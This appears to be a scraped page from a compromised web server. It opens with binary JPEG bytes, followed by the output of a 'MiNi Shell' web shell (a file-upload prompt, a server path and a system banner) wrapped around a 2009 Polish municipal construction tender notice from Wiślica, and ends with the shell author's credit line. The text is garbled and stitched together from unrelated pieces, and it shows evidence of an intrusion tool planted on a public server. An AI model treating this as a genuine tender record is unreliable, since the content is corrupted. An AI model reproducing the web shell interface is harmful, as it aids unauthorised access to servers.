JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090831/143805-N-2009.html

<p class="kh_header"><b>Wiślica: Urządzenie miejsc integracji społecznej w miejscowościach Skotniki Dolne, Skotniki Górne i Łatanice</b><br>
<b>Numer ogłoszenia: 143805 - 2009; data zamieszczenia: 31.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wiślica , ul. Okopowa 8, 28-160 Wiślica, woj. świętokrzyskie, tel. 041 3792106, faks 041 3722128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ug.wislica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Urządzenie miejsc integracji społecznej w miejscowościach Skotniki Dolne, Skotniki Górne i Łatanice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Urządzenie miejsc integracji w miejscowości Skotniki Dolne
1.Remont części budynku z przeznaczeniem na świetlicę wiejską w Skotnikach Dolnych
2.Utwardzenie placu postojowego
3. Budowa chodnika wraz z opaską budynku
4. Plac zabaw dla dzieci
5. Boisko trawiaste do mini piłki nożnej
6. Ogrodzenie terenu
7. Roboty rozbiórkowe 
8. Wyposażenie  świetlicy wiejskiej w Skotnikach Dolnych
II.  Urządzenie miejsc integracji w miejscowości Skotniki Górne
1.Remont budynku świetlicy w Skotnikach Górnych
2. Remont pomieszczeń świetlicy
3. Budowa chodnika wraz z opaską budynku
4. Utwardzenie placu postojowego
5. Plac zabaw dla dzieci
6. Boisko trawiaste do piłki nożnej
7. Wyposażenie  świetlicy wiejskiej w Skotnikach Górnych
III. Urządzenie miejsc integracji w miejscowości Łatanice
1. Remont elewacji budynku
2. Ogrodzenie terenu
3. Utwardzenie części placu 
4. Plac zabaw dla dzieci.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.25-6, 45.26.14.10-1, 45.26.12.13-0, 45.32.10.00-3, 45.32.40.00-4, 45.21.33.12-3, 45.11.27.23-9, 45.21.22.21-1, 45.34.20.00-6, 45.26.27.00-8, 45.23.31.61-5, 45.11.27.23-9, 36.13.10.00-8, 36.40.00.00-5, 32.32.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Oferta winna być zabezpieczona wadium wniesionym do dnia 23.09.2009r. do godz. 730, w wysokości: 15000 PLN (słownie: piętnaście tysięcy złotych).
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
- pieniądzu;
- w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Warunki udziału w postępowaniu.
Wykonawcą może być osoba fizyczna, osoba prawna albo jednostka organizacyjna nie posiadająca osobowości prawnej, która ubiega się o udzielenie zamówienia publicznego. O udzielenie zamówienia mogą się ubiegać Wykonawcy występujący wspólnie. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, których oferta odpowiada warunkom określonym w ustawie Prawo zamówień publicznych i spełnia wymagania określone w niniejszej Specyfikacji Istotnych Warunków Zamówienia. Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. W przypadku złożenia przez wykonawcę dokumentów sporządzonych w języku obcym Zamawiający wymaga złożenia tłumaczenia na język polski poświadczonego przez wykonawcę.
Wszystkie załączniki do niniejszej specyfikacji stanowią jej integralną część.
2. Wykonawcy ubiegający się o udzielenie przedmiotowego zamówienia muszą spełnić następujące warunki udziału w postępowaniu: 
2.1	Posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,

2.2	Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania,
Warunek ten będzie spełniony przez wykonawcę, jeżeli:
a) wykonał minimum co najmniej pięć robót budowlanych tożsamych z przedmiotem zamówienia o łącznej wartości 600 000 zł brutto, których przedmiotem była: 
- co najmniej jedna robota budowlana polegająca na budowie boiska o nawierzchni trawiastej do piłki nożnej,
- co najmniej jedna robota budowlana polegająca na budowie placu zabaw dla dzieci,
- co najmniej jedna robota budowlana polegająca na wykonaniu docieplenia budynku lub wykonaniu elewacji budynku,
- co najmniej jedna robota budowlana polegająca na budowie chodników i placów z kostki brukowej o powierzchni co najmniej 300 m2,
- co najmniej jedna robota budowlana polegająca na budowie budynku lub remoncie budynku.
 
b) dysponuje lub będzie dysponować w okresie przewidzianym na realizację zamówienia minimum dwoma osobami: kierownikiem robót posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń; oraz kierownika robót, posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń.

2.3	Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
Warunek ten będzie spełniony przez wykonawcę, jeżeli:
a) posiada obrót łącznie za ostatnie 3 lata obrotowe lub za okres prowadzenia działalności jeżeli jest krótszy w wysokości niemniejszej niż cena ofertowa brutto.
b) posiada środki finansowe w wysokości nie mniejszej niż 80% oferowanej ceny brutto lub zdolność kredytową w wysokości nie mniejszej niż 80% oferowanej ceny brutto.
c) posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w wysokości niemniejszej niż 600 000 zł.

2.4	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych,
3. Inne wymagania:
3.1	 złożą formularz ofertowy wraz z wymaganymi dokumentami, oświadczeniami, załącznikami oraz zaświadczeniami,
3.2	spełniają określone ustawą Prawo zamówień publicznych oraz niniejszą specyfikacją wymagania,
3.3	spełniają wymagania odnoszące się do przedmiotu zamówienia, a wynikające z innych ustaw. 

4. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:

4.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
4.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych.

5. Zamawiający odrzuca ofertę jeżeli:

5.1 jest niezgodną z ustawą
5.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych.
5.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
5.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
5.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
5.6 zawiera błędy w obliczeniu ceny 
5.7 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
5.8 jest nieważna na podstawie odrębnych przepisów, 

6. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.

7. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu 

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą - spełnia - nie spełnia w oparciu o oświadczenia i dokumenty złożone przez wykonawcę w celu potwierdzenia spełniania warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnia warunków udziału w postępowaniu wykonawcy składają w formie oryginału lub kserokopii  poświadczonej za zgodność z oryginałem przez wykonawcę następujące dokumenty:
1. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zamawiający żąda następujących dokumentów:

1.1  aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

1.2 aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy dołączyć  wymagane w punkcie 6.1 SIWZ dotyczące wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia.
1.3 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa:
- w ppkt. 1.1), 1.2) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ppkt. 1.1 i 1.2 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Wymogi dotyczące terminów wystawienia dokumentów podane wyżej stosuje się odpowiednio. 

2. W celu potwierdzenia warunku posiadania przez niezbędnej wiedzy i doświadczenie oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienie pisemnego zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania, zamawiający żąda następujących dokumentów:

2.1 sporządzenia i załączenia do oferty wykazu wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz dokumentami potwierdzającymi, że roboty te zostały wykonane należycie -załącznik nr 6. Wymagane jest wykazanie wykonania co najmniej pięć robót budowlanych tożsamych z przedmiotem zamówienia o łącznej wartości 600 000 zł brutto, których przedmiotem była:
- co najmniej jedna robota budowlana polegająca na budowie boiska o nawierzchni trawiastej do piłki nożnej,
- co najmniej jedna robota budowlana polegająca na budowie placu zabaw dla dzieci,
- co najmniej jedna robota budowlana polegająca na wykonaniu docieplenia budynku lub wykonaniu elewacji budynku,
- co najmniej jedna robota budowlana polegająca na budowie chodników i placów z kostki brukowej o powierzchni co najmniej 300 m2,
- co najmniej jedna robota budowlana polegająca na budowie budynku lub remoncie budynku.
 
Zamawiający żąda załączenia do oferty dokumentów potwierdzających, że wykazane robota została wykonana należycie. Dokumentami potwierdzającymi wykonanie należyte wykazanej roboty są: referencje lub protokoły odbioru robót.
Dokumenty potwierdzające wykonanie należyte wykazanej roboty winny co najmniej zawierać następujące informacje:
- wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował roboty, których dokumenty dotyczą,
- wskazanie podmiotu, na rzecz, którego realizowane były roboty,
- wskazanie zakresu i wartości wykonanych robót,
- wskazanie daty wykonania (rozpoczęcia, zakończenia),
- wskazanie miejsca wykonania.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek mogą spełniać łącznie.

2.2 sporządzenie i załączenie do oferty wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - załącznik nr 6.
Wymagane jest wykazanie: 
- kierownika robót, posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń, 
- kierownika robót, posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń.
Do wykazu należy załączyć kopię dokumentów potwierdzających posiadanie uprawnień budowlanych oraz ważne na dzień składania ofert kopie zaświadczeń o wpisie do właściwej izby samorządu zawodowego. 
- załączenie do oferty Zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie Potencjał kadrowy wykonawca wskazał osoby, którymi będzie dysponował - załącznik nr 6A.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, ww warunek mogą spełniać łącznie. 

3. W celu potwierdzenia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów:

3.1 sprawozdania finansowego albo jego części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części albo w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, informację określającą obroty, zysk oraz zobowiązania i należności ogółem na załączniku nr 4, - za okres nie dłuższy niż ostatnie 3 lata obrotowe tj. 2006, 2007, 2008, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
Wymagane jest wykazanie obrotu łącznie za ostatnie 3 lata obrotowe lub za okres prowadzenia działalności jeżeli jest krótszy w wysokości niemniejszej niż cena ofertowa brutto.
W przypadku składania oferty przez podmioty występujące wspólnie właściwe dokumenty muszą być złożone przez każ?dy podmiot.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek mogą spełniać łącznie.

3.2 informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych w wysokości nie mniejszej niż 80% oferowanej ceny brutto lub zdolność kredytową wykonawcy w wysokości nie mniejszej niż 80% oferowanej ceny brutto, wystawiona nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert,
W przypadku składania oferty przez podmioty występujące wspólnie właściwe dokumenty muszą być złożone przez każ?dy podmiot.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek mogą spełniać łącznie.

3.3 polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w wysokości niemniejszej niż 600 000 zł.
W przypadku składania oferty przez podmioty występujące wspólnie właściwe dokumenty muszą być złożone przez każ?dy podmiot.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek mogą spełniać łącznie. 

4. Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu i niepodleganiu wykluczeniu z postępowania:
4.1	złożenie oświadczenia potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 pkt 1-3 ustawy Prawo zamówień publicznych- załącznik nr 2,W przypadku składania oferty przez wykonawców występujących wspólnie ww dokument składają wykonawcy, którzy pojedynczo lub łącznie spełniają określony warunek w postępowaniu. Oznacza to, że jeżeli dany warunek spełnia wyłącznie jeden z wykonawców to w tym zakresie wykonawca ten składa przedmiotowe oświadczenie. Jeżeli natomiast wymagany warunek wykonawcy spełniają łącznie, oświadczenie musi być złożone wspólnie przez tych wykonawców.
4.2	złożenie oświadczenia potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 pkt 4 ustawy Prawo zamówień publicznych- załącznik nr 3, W przypadku składania oferty przez wykonawców występujących wspólnie, wyżej wymienione oświadczenie musi złożyć każdy wykonawca.

5.  Wykaz innych dokumentów wymaganych przez zamawiającego, które wykonawca winien złożyć w przedmiotowym postępowaniu:
5.1 Oferta (sporządzony według wzoru druku załączonego przez Zamawiającego) - załącznik nr 1  do SIWZ,
5.2 Informacja o podwykonawstwie (sporządzony według wzoru druku stanowiącego- załącznik nr 7  do SIWZ), UWAGA! Wyłącznie wykonawcy oferujący wykonanie przedmiotu zamówienia z udziałem podwykonawców składają przedmiotową informacje,
5.3 Zestawienie kosztorysów ofertowych (sporządzone według wzoru druku stanowiącego- załącznik nr 8  do SIWZ),
5.4 Zestawienia cenowe wyposażenia świetlic wiejskich w Skotnikach Dolnych i Skotnikach Górnych (sporządzone według wzoru stanowiącego załącznik nr 9 do SIWZ)
5.4 Kosztorysy ofertowe (sporządzone według wzorów druków - przedmiarów stanowiących załącznik nr 12 do SIWZ),
e) Pełnomocnictwo, gdy Wykonawcę reprezentuje pełnomocnik lub gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia,
f) Dowód wniesienia wadium.
g) Parafowany wzór umowy,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ug.wislica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Gminy w Wiślicy, ul. Okopowa 8,28-160 Wiślica pok.Nr 12 w godz. urzędowania od pon. do pt w godzinach od 7:00 do 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2009 godzina 07:30, miejsce: Urząd Gminy w Wiślicy, ul. Okopowa 8, sekretariat, 28-160 Wiślica.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com